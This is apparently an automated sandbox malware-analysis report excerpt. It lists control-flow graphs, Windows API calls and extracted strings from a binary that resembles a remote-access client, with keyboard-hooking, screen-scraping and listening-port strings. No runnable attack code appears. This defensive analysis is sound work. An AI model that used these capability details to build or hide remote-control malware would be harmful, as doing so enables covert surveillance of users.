                                                                                                              control_flow_graph 2006 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 2007 110a9cf8-110a9d09 SetupDiGetClassDevsA 2006->2007 2008 110a9e05-110a9e0d SetLastError 2006->2008 2009 110a9d0f-110a9d1d 2007->2009 2010 110a9f13-110a9f15 2007->2010 2014 110a9e19-110a9e1b SetLastError 2008->2014 2011 110a9d20-110a9d24 2009->2011 2012 110a9f1e-110a9f20 2010->2012 2013 110a9f17-110a9f18 FreeLibrary 2010->2013 2015 110a9d3d-110a9d55 2011->2015 2016 110a9d26-110a9d37 GetProcAddress 2011->2016 2017 110a9f37-110a9f52 call 11161d01 2012->2017 2013->2012 2018 110a9e21-110a9e2c GetLastError 2014->2018 2015->2018 2028 110a9d5b-110a9d5d 2015->2028 2016->2014 2016->2015 2020 110a9e32-110a9e3d call 11162be5 2018->2020 2021 110a9ec0-110a9ed1 GetProcAddress 2018->2021 2020->2011 2022 110a9edb-110a9edd SetLastError 2021->2022 2023 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 2021->2023 2027 110a9ee3-110a9ee5 2022->2027 2023->2027 2027->2010 2030 110a9ee7-110a9f09 CreateFileA 2027->2030 2031 110a9d68-110a9d6a 2028->2031 2032 110a9d5f-110a9d65 call 11162be5 2028->2032 2033 110a9f0b-110a9f10 call 11162be5 2030->2033 2034 110a9f22-110a9f2c call 11162be5 2030->2034 2036 110a9d6c-110a9d7f GetProcAddress 2031->2036 2037 110a9d85-110a9d9b 2031->2037 2032->2031 2033->2010 2046 110a9f2e-110a9f2f FreeLibrary 2034->2046 2047 110a9f35 2034->2047 2036->2037 2040 110a9e42-110a9e4a SetLastError 2036->2040 2042 110a9d9d-110a9da6 GetLastError 2037->2042 2048 110a9dac-110a9dbf call 11162b51 2037->2048 2040->2042 2042->2048 2049 110a9e81-110a9e92 call 110a9c30 2042->2049 2046->2047 2047->2017 2054 110a9ea2-110a9eb3 call 110a9c30 2048->2054 2055 110a9dc5-110a9dcd 2048->2055 2056 110a9e9b-110a9e9d 2049->2056 2057 110a9e94-110a9e95 FreeLibrary 2049->2057 2054->2056 2065 110a9eb5-110a9ebe FreeLibrary 2054->2065 2058 110a9dcf-110a9de2 GetProcAddress 2055->2058 2059 110a9de4-110a9dfb 2055->2059 2056->2017 2057->2056 2058->2059 2061 110a9e4f-110a9e51 SetLastError 2058->2061 2063 110a9e57-110a9e71 call 110a9c30 call 11162be5 2059->2063 2067 110a9dfd-110a9e00 2059->2067 2061->2063 2063->2056 2071 110a9e73-110a9e7c FreeLibrary 2063->2071 2065->2017 2067->2011 2071->2017
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(setupapi.dll,E43C2CA5,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                                              • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                                              • _free.LIBCMT ref: 110A9D60
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                                              • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                                              • _malloc.LIBCMT ref: 110A9DB3
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                                              • GetLastError.KERNEL32 ref: 110A9E21
                                                                                                              • _free.LIBCMT ref: 110A9E33
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                                              • _free.LIBCMT ref: 110A9E64
                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                              • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                              • API String ID: 3464732724-3340099623
                                                                                                              • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                              • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                                              • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                              • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2268 11133920-1113395c 2269 11133962-11133984 call 1105dd10 2268->2269 2270 11133c84-11133c9f call 11161d01 2268->2270 2269->2270 2275 1113398a-1113399e GetLocalTime 2269->2275 2276 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 2275->2276 2277 111339a0-111339bc call 11146450 2275->2277 2284 11133a45-11133a5b GetProcAddress 2276->2284 2285 11133a5d-11133a64 GetProcessHandleCount 2276->2285 2277->2276 2284->2285 2286 11133a66-11133a68 SetLastError 2284->2286 2287 11133a6e-11133a76 2285->2287 2286->2287 2288 11133a92-11133a9e 2287->2288 2289 11133a78-11133a90 GetProcAddress 2287->2289 2292 11133aa0-11133ab8 GetProcAddress 2288->2292 2293 11133aba-11133ac5 2288->2293 2289->2288 2290 11133ac7-11133ad2 SetLastError 2289->2290 2290->2292 2292->2293 2294 11133ad4-11133adc SetLastError 2292->2294 2295 11133adf-11133aef GetProcAddress 2293->2295 2294->2295 2297 11133af1-11133afd K32GetProcessMemoryInfo 2295->2297 2298 11133aff-11133b01 SetLastError 2295->2298 2299 11133b07-11133b15 2297->2299 2298->2299 2300 11133b23-11133b2e 2299->2300 2301 11133b17-11133b1f 2299->2301 2302 11133b30-11133b38 2300->2302 2303 11133b3c-11133b47 2300->2303 2301->2300 2302->2303 2304 11133b55-11133b5f 2303->2304 2305 11133b49-11133b51 2303->2305 2306 11133b61-11133b68 2304->2306 2307 11133b6a-11133b6d 2304->2307 2305->2304 2308 11133b6f-11133b7d call 11146450 2306->2308 2307->2308 2309 11133b80-11133b92 2307->2309 2308->2309 2313 11133c5a-11133c68 2309->2313 2314 11133b98-11133baa call 110637c0 2309->2314 2315 11133c6a-11133c6b FreeLibrary 2313->2315 2316 11133c6d-11133c75 2313->2316 2314->2313 2322 11133bb0-11133bd1 call 1105dd10 2314->2322 2315->2316 2318 11133c77-11133c78 FreeLibrary 2316->2318 2319 11133c7a-11133c7f 2316->2319 2318->2319 2319->2270 2321 11133c81-11133c82 FreeLibrary 2319->2321 2321->2270 2325 11133bd3-11133bd9 2322->2325 2326 11133bdf-11133bfb call 1105dd10 2322->2326 2325->2326 2327 11133bdb 2325->2327 2330 11133c06-11133c22 call 1105dd10 2326->2330 2331 11133bfd-11133c00 2326->2331 2327->2326 2335 11133c24-11133c27 2330->2335 2336 11133c2d-11133c49 call 1105dd10 2330->2336 2331->2330 2332 11133c02 2331->2332 2332->2330 2335->2336 2337 11133c29 2335->2337 2340 11133c50-11133c53 2336->2340 2341 11133c4b-11133c4e 2336->2341 2337->2336 2340->2313 2342 11133c55 call 11027780 2340->2342 2341->2340 2341->2342 2342->2313
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,E43C2CA5), ref: 1113398E
                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                                              • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                                              • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                                              • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                                              • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                              • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                              • API String ID: 263027137-1001504656
                                                                                                              • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                              • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                                              • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                              • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2344 1102dbc9 2345 1102dbd0-1102dbe1 2344->2345 2345->2345 2346 1102dbe3 2345->2346 2347 1102dd24-1102dd3d call 11142ac0 2346->2347 2350 1102dd43-1102dd45 2347->2350 2351 1102dbc0-1102dbc3 2347->2351 2352 1102de43-1102de5d call 111463d0 2350->2352 2353 1102dd4b-1102dd51 2350->2353 2354 1102dbc5-1102dbc7 2351->2354 2355 1102dbe8-1102dbf1 2351->2355 2373 1102deb3-1102debf call 1102b4f0 2352->2373 2374 1102de5f-1102de78 call 1105dd10 2352->2374 2357 1102dd53-1102dd62 call 11144dc0 2353->2357 2358 1102dd68-1102dd78 2353->2358 2354->2345 2355->2347 2359 1102dbf7-1102dbfe 2355->2359 2357->2358 2362 1102dd7a 2358->2362 2363 1102dd7f-1102dd9d call 1102cc10 2358->2363 2359->2347 2364 1102dcf3-1102dd08 call 11162de7 2359->2364 2365 1102dc05-1102dc07 2359->2365 2366 1102dd0a-1102dd1f call 11162de7 2359->2366 2367 1102dc9a-1102dccd call 111618c1 call 11142290 2359->2367 2368 1102dcdb-1102dcf1 call 11164010 2359->2368 2369 1102dc8b-1102dc95 2359->2369 2370 1102dccf-1102dcd9 2359->2370 2371 1102dc4c-1102dc52 2359->2371 2372 1102dc7c-1102dc86 2359->2372 2362->2363 2363->2352 2396 1102dda3-1102ddc8 call 110b7920 call 11146450 2363->2396 2364->2347 2365->2347 2383 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2365->2383 2366->2347 2367->2347 2368->2347 2369->2347 2370->2347 2376 1102dc54-1102dc68 call 11162de7 2371->2376 2377 1102dc6d-1102dc77 2371->2377 2372->2347 2399 1102dec1-1102dec8 2373->2399 2400 1102de98-1102de9f 2373->2400 2374->2373 2403 1102de7a-1102de8c 2374->2403 2376->2347 2377->2347 2383->2347 2425 1102ddd3-1102ddd9 2396->2425 2426 1102ddca-1102ddd1 2396->2426 2406 1102dea5-1102dea8 2399->2406 2409 1102deca-1102ded4 2399->2409 2400->2406 2407 1102e0aa-1102e0cb GetComputerNameA 2400->2407 2403->2373 2419 1102de8e 2403->2419 2415 1102deaa-1102deb1 call 110b7920 2406->2415 2416 1102ded9 2406->2416 2413 1102e103-1102e109 2407->2413 2414 1102e0cd-1102e101 call 11027c30 2407->2414 2409->2407 2423 1102e10b-1102e110 2413->2423 2424 1102e13f-1102e152 call 11164010 2413->2424 2414->2413 2447 1102e157-1102e163 2414->2447 2422 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2415->2422 2416->2422 2419->2400 2481 1102e07a-1102e082 SetLastError 2422->2481 2482 1102dfbc-1102dfd3 2422->2482 2431 1102e116-1102e11a 2423->2431 2444 1102e347-1102e36a 2424->2444 2433 1102dddb-1102dde2 call 11027d60 2425->2433 2434 1102de39 2425->2434 2426->2352 2437 1102e136-1102e138 2431->2437 2438 1102e11c-1102e11e 2431->2438 2433->2434 2451 1102dde4-1102de16 2433->2451 2434->2352 2442 1102e13b-1102e13d 2437->2442 2439 1102e132-1102e134 2438->2439 2440 1102e120-1102e126 2438->2440 2439->2442 2440->2437 2446 1102e128-1102e130 2440->2446 2442->2424 2442->2447 2455 1102e392-1102e39a 2444->2455 2456 1102e36c-1102e372 2444->2456 2446->2431 2446->2439 2452 1102e165-1102e17a call 110b7920 call 11029bd0 2447->2452 2453 1102e17c-1102e18f call 11081a70 2447->2453 2472 1102de20-1102de2f call 110f6080 2451->2472 2473 1102de18-1102de1e 2451->2473 2486 1102e1d3-1102e1ec call 11081a70 2452->2486 2470 1102e191-1102e1b4 2453->2470 2471 1102e1b6-1102e1b8 2453->2471 2463 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2455->2463 2464 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2455->2464 2456->2455 2461 1102e374-1102e38d call 1102d330 2456->2461 2461->2455 2464->2463 2470->2486 2476 1102e1c0-1102e1d1 2471->2476 2477 1102de32-1102de34 call 1102d330 2472->2477 2473->2472 2473->2477 2476->2476 2476->2486 2477->2434 2488 1102e043-1102e04f 2481->2488 2482->2488 2498 1102dfd5-1102dfde 2482->2498 2506 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2486->2506 2507 1102e32c-1102e339 call 11164010 2486->2507 2494 1102e092-1102e0a1 2488->2494 2495 1102e051-1102e05d 2488->2495 2494->2407 2502 1102e0a3-1102e0a4 FreeLibrary 2494->2502 2499 1102e06f-1102e073 2495->2499 2500 1102e05f-1102e06d GetProcAddress 2495->2500 2498->2488 2504 1102dfe0-1102e016 call 11146450 call 1112b270 2498->2504 2508 1102e084-1102e086 SetLastError 2499->2508 2509 1102e075-1102e078 2499->2509 2500->2499 2502->2407 2504->2488 2527 1102e018-1102e03e call 11146450 call 11027920 2504->2527 2544 1102e283-1102e299 call 11128ec0 2506->2544 2545 1102e26f-1102e27e call 11029450 2506->2545 2523 1102e33c-1102e341 CharUpperA 2507->2523 2511 1102e08c 2508->2511 2509->2511 2511->2494 2523->2444 2527->2488 2549 1102e2b2-1102e2ec call 110d0bd0 * 2 2544->2549 2550 1102e29b-1102e2ad call 110d0bd0 2544->2550 2545->2544 2557 1102e302-1102e32a call 11164010 call 110d07c0 2549->2557 2558 1102e2ee-1102e2fd call 11029450 2549->2558 2550->2549 2557->2523 2558->2557
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID: $14/03/16 10:38:31 V12.10F8$927537$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                              • API String ID: 1029625771-959273598
                                                                                                              • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                              • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                                              • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                              • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2564 111414a0-111414e1 call 11146450 2567 111414e7-11141543 LoadLibraryA 2564->2567 2568 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2564->2568 2569 11141545-11141550 call 11017450 2567->2569 2570 11141557-11141560 2567->2570 2579 11141595-1114159b 2568->2579 2580 111415c3 2568->2580 2569->2570 2578 11141552 call 110cc7f0 2569->2578 2570->2568 2574 11141562-11141563 FreeLibrary 2570->2574 2574->2568 2578->2570 2579->2580 2582 1114159d-111415a3 2579->2582 2583 111415cd-111415ed GetClassInfoExA 2580->2583 2582->2580 2584 111415a5-111415c1 call 1105dd10 2582->2584 2585 111415f3-1114161a call 11161d20 call 111444b0 2583->2585 2586 1114168e-111416e6 2583->2586 2584->2583 2595 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2585->2595 2596 1114161c-11141630 call 11029450 2585->2596 2597 11141722-11141728 2586->2597 2598 111416e8-111416ee 2586->2598 2595->2586 2622 11141677-1114168b call 11029450 2595->2622 2596->2595 2602 11141764-11141786 call 1105dd10 2597->2602 2603 1114172a-11141739 call 1110f420 2597->2603 2598->2597 2600 111416f0-111416f6 2598->2600 2600->2597 2605 111416f8-1114170f call 1112c830 LoadLibraryA 2600->2605 2617 11141794-11141799 2602->2617 2618 11141788-11141792 2602->2618 2615 1114175d 2603->2615 2616 1114173b-1114175b 2603->2616 2605->2597 2621 11141711-1114171d GetProcAddress 2605->2621 2623 1114175f 2615->2623 2616->2623 2619 111417a5-111417ab 2617->2619 2620 1114179b 2617->2620 2618->2619 2624 111417ad-111417b3 call 110f7d00 2619->2624 2625 111417b8-111417d1 call 1113cd80 2619->2625 2620->2619 2621->2597 2622->2586 2623->2602 2624->2625 2632 111417d7-111417dd 2625->2632 2633 11141879-1114188a 2625->2633 2634 111417df-111417f1 call 1110f420 2632->2634 2635 11141819-1114181f 2632->2635 2646 111417f3-11141809 call 1115d6d0 2634->2646 2647 1114180b 2634->2647 2636 11141845-11141851 2635->2636 2637 11141821-11141827 2635->2637 2641 11141853-11141859 2636->2641 2642 11141868-11141873 #17 LoadLibraryA 2636->2642 2639 1114182e-11141840 SetTimer 2637->2639 2640 11141829 call 11134930 2637->2640 2639->2636 2640->2639 2641->2642 2645 1114185b-11141861 2641->2645 2642->2633 2645->2642 2649 11141863 call 1112d6a0 2645->2649 2648 1114180d-11141814 2646->2648 2647->2648 2648->2635 2649->2642
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                                              • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                                              • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                                              • _memset.LIBCMT ref: 111415F9
                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                                              • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                                              • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                                              • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                                              • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                                              • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                                              • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                                              • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                                                • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,E43C2CA5,1102FCB2,00000000), ref: 1101747E
                                                                                                                • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                                • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                                • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                                • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                                                • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                              • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                              • API String ID: 3706574701-3145203681
                                                                                                              • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                              • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                                              • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                              • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
